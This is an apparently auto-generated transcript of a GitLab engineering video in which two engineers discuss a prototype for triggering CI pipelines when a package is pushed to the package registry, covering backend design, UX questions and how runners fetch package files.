►
From YouTube: Technical discussion on CI Pipelines for packages
Description
A
This
one
hello,
everyone,
I'm
david
from
the
package
team
and
today
we
will
just
be
discussing
the
technical
changes
for
this
idea
of
pipelines.
For
and
with
me
today.
I
have
jegosh
staff
backend
engineer
at
gitlab
and
let's
dive
in,
I
guess
so.
A
The
main
idea
is
usually
we
trigger
a
pipeline
when
you
have
a
git
push
and
the
idea
is
to
trigger
pipeline
when
the
package
is
pushed
to
the
package
registry,
and
so
we
do
have
a
new
event,
which
is
the
package
push,
and
the
thing
is
that
the
package
can
come
from
several
sources.
A
It
can
come
from
a
ci
pipeline
from
a
gitlab
project.
It
can
come
from
an
external
process.
You
could
have
an
external
ci
pipeline,
building
the
the
package
and
pushing
it
to
the
github
package
registry
and
it
can
also
come
from
a
manual
process.
You
could
very
well
be
building
your
package
on
your
console
and
pushing
it
to
the
to
the
package
registry.
A
A
A
I
will
guess
I
will
share
my
screen
and
this
way
we
will
see
the
changes
this
one
sure,
okay,
so
the
changes
I
had
to
do.
A
I
did
it
in
two
different
projects:
the
rails
back
end
and
the
gitlab
runner.
So
let's
start
with
the
raze
back
end.
A
B
So
I
have
a
few
questions
because
I
think
it's
a
common
theme
to
actually
have
a
repository
for
a
package
and
to
build
a
package
in
the
continuous
integration,
continuous
delivery
pipeline
from
that
repository.
So
it
feels
a
bit
awkward
that
whenever
you
push
such
packet
from
a
ci
environment,
you
would
still
trigger
another
pipeline
to
validate
something.
I
know
that
it
might
be
suitable
for
a
big
different
use
case
right,
but
in
this
case
it
feels
you
know
a
bit
disconnected
from
the
usual
workflow
of
building
packages
and
publishing
them
within
the
ci.
A
A
So
in
the
demo,
one
of
the
jobs
is
running
package
hunter,
so
package
hunter
will
take
a
package
file
and
it
will
actually,
I
think
it
tries
to
install
it
and
and
check
what
it
is
doing
with
the
system,
and
it
was
a
bit
popular
a
few
months
ago
where
you
could
have,
for
example,
for
npm
packages.
You
can
have
a
b4
script
where
you
have.
Basically,
you
can
input
a
shell
command
and
you
can
do
whatever
you
want.
A
B
Yeah,
I
think
it
makes
sense
like,
depending
on
how
we
configure
the
pipeline
that
is
going
to
be
created
upon
the
push
of
a
package
like
it
might
even
make
sense
in
a
regular
workflow,
because
you
can,
for
example,
do
some
pre-flight
checks
before
you
publish
the
package
after
actually
being
able
to
confirm
that
it's
already
in
the
package
repository,
but
just
wait
for
being
made
available
for
everyone
else.
B
So
yeah.
I
think
it
makes
sense.
We
still
need
to
have
kit
repository
because
we
do
need
to
keep
somewhere
and
it
needs
to
be
versioned.
So
the
repository
will
need
to
be
there
anyway.
So
yeah.
A
Yeah,
okay,
so
so
the
main
issue
I
faced
here
is
that
how
do
you
link
a
pipeline
object
with
a
package
file,
because
in
the
package
theme
we
have
mainly
two
files,
the
package
and
the
package
files?
So
here
I
wanted
to
link
a
pipeline
with
a
package
file,
and
the
issue
is
that
we,
as
I
said,
we
don't
have
any
any
concept
of
comicha
or
reference
or
something.
So
what
I
did
is
that
I
created
an
intermediary
object
with
which
I
called
a
push.
A
Well,
it's
it's
not
a
great
name.
I
guess
the
there
is
a
better
name,
but
it's
actually
an
object
that
would
be
created
when
you
push
a
package,
a
package
file,
so
it
will
link
the
package
file
and
the
pipeline.
Do
you
see
clearly
my
screen
or
do
you
want
me
to
increase
the
font
size.
B
Okay,
so
creating
pipelines
for
arbitrary
actions
like
packages
being
pushed
or
stuff
like
that,
that's
that's,
not
the
challenge,
because
we
are
doing
that
already
with
chat
ups,
for
example,
and
this
is
an
established
pattern
of
being
able
to
run
some
kind
of
a
script
whenever
something
happens.
B
How
chat
ups
is
implemented,
in
my
opinion,
still
like
a
bit.
I
would
do
that
differently.
Perhaps,
but
right
now,
that's
an
established
pattern,
so
I
guess
that
we
can
at
least
replicate
some
parts
of
it
and
that's
fine
having
some
kind
of
an
identifier
or
a
sha
assigned
whenever
we
push
something
like
it
might
work.
But
then
there
are
like
a
couple
of
follow-up
questions.
Someone
might
ask
so,
for
example,
do
we
want
to
trigger
a
separate
pipeline
every
time
someone
is
pushing
the
same
thing?
B
B
The
main
challenge,
in
my
opinion,
is
not
really
how
we
implement
that,
but
the
ux,
because
someone
needs
to
somehow
associate
pipelines
with
the
push
events.
We
need
to
have
some
kind
of
a
view
for
that.
If
it
does
not
exist
already,
we
need
to
have
some
way
of
telling
users
what
the
status
of
such
pipeline
was
and
and
stuff
like
that.
So
it's
more
like,
in
my
opinion,
it's
more
like
you
know
a
ux
challenge
than
a
back-end
challenge.
Actually.
A
Well,
for
for
the
ui,
it
was
far
easier
than
I
thought
and
I
could
let
me
see
if
I
can
grab
the
I
I
don't
have
the
demo
running
live.
B
A
That's
fine,
of
course
I
will
reuse
the
video.
So
basically
we
have
a
screen
where
you
have
all
your
packages
and
you
can
see
if
what
is
the
latest
status
of
the
package,
it
will
pull
the
latest
package
file
uploaded
and
pull
the
pipeline
status
for
that
yeah.
Here
it
is
so
you
have
the
all
the
packages
and
you
can.
B
A
Yeah,
so
I
think
I
don't
have
the
screen
shown
in
the
nebula,
but
actually,
if
you
you
can
click
on
the
package
and
you
can
see
the
files
and
I
did
that
for
the
demo,
but
I
didn't
use
the
screen.
Let
me
show
you
I
think
we
do
have
here.
A
Anyone
will
do
so.
I
put
a
pipeline
status
icon
too
in
this
in
this
screen.
So
this
screen
is
the
you
have
the
package
and
you
have
the
files
for
some
package
types.
We
will
allow
duplicates
uploads,
meaning
that
you
could
overwrite
a
given
version.
A
B
A
I
don't
think
that
we
have
support
for
the
young
command
on
npm,
although
that
that's
a
good
question,
because
we
are
implementing
a
delete
package
file
action
in
the
ui,
so
you
would
have
here.
Oh
actually,
it
was
already.
B
So
so
I
guess
that
it's
more
like
ux
discussion
with
a
ux
team
member
right.
So
it's
presumably
something
that
needs
a
design
anyway,
and
you
can
always
describe
what
the
workflow,
how
the
workflow
looks
like
and.
A
A
There
was
a
few
things
that
were
not
working
like
this
commit
column,
since
we
are
not
referencing
a
comment,
but
the
the
the
whole
ui
was
working,
the
links
were
working,
I
could
open
the
pipeline
and
this
screen
was
working
to
the
pipeline
details.
I
guess
it
is
so
there
is
already
a
good
part
of
the
ui
working,
but
you
are
right
that
there
are
still
some
questions
on
the
ux
for
this,
but,
like.
A
Yeah
the
the
thing
is
that
what
do
you
do
in
the
case
of
pushing
a
package
from
the
command
line
manually?
You
are
not
referencing.
Any
comment.
B
A
Well,
for
what
I
did
for
the
demo,
so
I
this
is
another
question
on
the
back
end,
what
we
do
with
the
the
yaml
file
and
for
the
demo.
I
just
used
the
regular
standard
yaml
file
and
it
was
picked
up
without
referencing.
Any
comment.
B
But
you
you
had
to
create
the
standard,
regular
ci
yam
file,
and
you
had
to
put
that
into
repository
under
some
kind
of
a
show
yeah.
So
there
is
a
sha
of
the
commit
being
used
to
read
the
ci
configuration
right.
So
that's
actually
the
connection
with
the
repository,
because
we
need
to
parse
labs
here,
yaml
file
from
the
repository
and
that's
the
version
of
the
pipeline.
A
A
Okay,
I
see
yeah,
this
is
was
also
a
question.
Do
we
use
the
standard
file
or
do
you
do
we
use
a
dedicated
one?
What's
the
standard
file,
the
the
gitlab.ci
dot
yaml
file?
Well,.
B
I
think
if
you
want
to
be
in
line
with
what
we
are
doing
with
chat
ops
chat,
ops
is
using
the
standalone
standard
jam
file,
but
there
is
a
specific
job
that
only
can
run
for
chat.
Ups.
It's
very
not
polished
right
now,
because
in
order
to
indicate
that
that's
a
chat
of
job,
you
just
put
the
entry
only
chat,
only
chat.
A
Yeah
makes
sense.
My
first
idea
was
to
have
a
different
file,
but
I
guess
both
sides
have
arguments
and
I
can
see
why
it
would
be
better
to
have
everything
in
the
same
file.
B
Yeah,
so
I
I
think,
there's
some
value
in
replicating
how
chat
ups
works
and
it's
not
only
chatos.
We
do
have
also,
I
think,
some
kind
of
actions
being
done
when
you
edit
something
in
web
ide.
I
cannot
remember
exactly,
but
you
would
need
to
check
that,
but
whenever
you
do
something
in
the
web
idea
ide,
I
I
remember
that
we
also
create
a
dangling
pipeline.
B
A
A
Going
back
to
the
cold
yeah,
I
I
I
do
have
a
service
creating
the
pipeline,
and
this
is
the
the
location
where
I'm
not
happy
with
it.
So
I'm
using
the
regular
create
pipeline
service,
but
I
saw
that
some
properties
were
mandatory,
such
as
a
ref
and
I
use
before
sha.
But
I'm
not
sure
that
was
the
the
the
proper
way
and
well
I'm
just
putting
some
values
so
that
the
service
is
happy.
But
yeah.
B
B
So
I
think
that
we
can
without
I
instead
of
prep,
we
can
use
default
branch
and
instead
of
push,
we
can
actually
use.
The
version
latest,
like
the
latest
comment
on
the
master
branch
right,
because
you
want
to
read
the
latest
gitlab
crm
file,
yeah
correct.
A
A
Okay,
great
yeah,
that's
about
it
for
the
rails
part.
Do
you
have
any
other
questions.
A
Yeah
because
the
runner
is
by
default,
it
is
downloading
the
git
repository,
but
the
thing
is,
it
has
to
download
the
package
file,
not
the
gate
repository.
I.
B
I
think
it
still
makes
sense
to
download
the
repository,
because
you
can
put
some
support
files
in
it
that
you
are
going
to
use
in
the
package
packet
job
only
package
or
something
like
that,
so
downloading
it
repository
is
fine.
B
What
can
be
interesting
is
actually
to
serve
the
package
as
an
artifact
so
that
you
could
you
reuse
everything
around
downloading
artifacts,
because
a
package
is
actually
an
artifact
right.
So
you
would
need
to
augment
the
code
responsible
for
sending
the
details
about
artifacts
to
the
runner.
B
You
would
need
to
you
know,
because
runner
is
able
to,
for
example,
retrieving
objects
from
object,
storage
and
it
can
retrieve
zip
files
for
gitlab
like
it
can
do
a
lot.
So
you
know
fitting
the
package
file
as
an
artifact
can
actually
make
it
almost
transparent,
almost
transparent.
So
I
guess
that
you
might
not
even
need
to
change
anything
yeah.
A
Yeah,
I
guess
I,
since
it's
both
areas
are
kind
of
new
to
me,
so
I
missed
a
lot
of
information
yeah.
I
implemented
something
similar
like
that,
which
is
an
api
that
will
just
pull
the
package
file
from
object
storage,
but
if
something
already
exists,
yeah
totally,
we
should
use
that
instead
and
this
will
avoid
any
change
on
the
owner
side.
A
On
the
ruiner
side,
I
had
this
question
if
the
runner
had
to
extract
the
package
file
because
usually
package
files
are
artifacts
that
are
archives,
but
I'm
feeling
that
this
is
going
a
bit
too
far.
A
It's
not
the
runner
responsibility
to
do
that,
and
I
guess
it
would
be
better
to
do
it
in
the
in
the
job
directly.
For.
A
For
example,
mpm
packages
are
terrible
archives,
so
you
could
download
it
from
object
storage.
But
then,
if
you
want
to,
I
don't
know
analyze
the
the
package
dot
json
file,
you
need
to
extract
the
files
from
that
archive.
B
So,
basically,
I
would
say
that
leave
that
for
the
next
iteration
and
do
not
extract
like
any
soprano
runner
can
automatically
extract
zip
files.
There
is
a
type
of
artifact
that
will
be
downloaded
without
being
extracted.
B
A
Yeah,
the
most
common
type
is
a
zip
file,
but
the
file
extension
is
not
zip.
Like
the
the
java
jar
files.
They
are
just
regular,
zip
files,
but
if
you
don't
have
the
zip
file
extension,
but
but
okay,
I
guess
we
can
do
something
work
with
with
that
artifact
system
and
it
should
be
okay,
okay,
so
this
was
way
shorter
than
I
thought.